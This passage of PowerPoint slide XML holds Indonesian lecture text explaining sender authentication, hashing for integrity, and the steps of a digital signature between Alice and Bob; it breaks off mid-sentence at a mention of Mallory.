              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditiru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh orang lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>yaitu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengendalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh orang lain. Hashing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuktikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intisari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>variabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (Alice) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intisari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disepakati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SHA256, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penandatanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intisari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipilihnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melampirkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bob.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Alice, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intisari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Alice) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash Alice.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transmisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjamin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (Mallory) </a:t>
            </a:r>
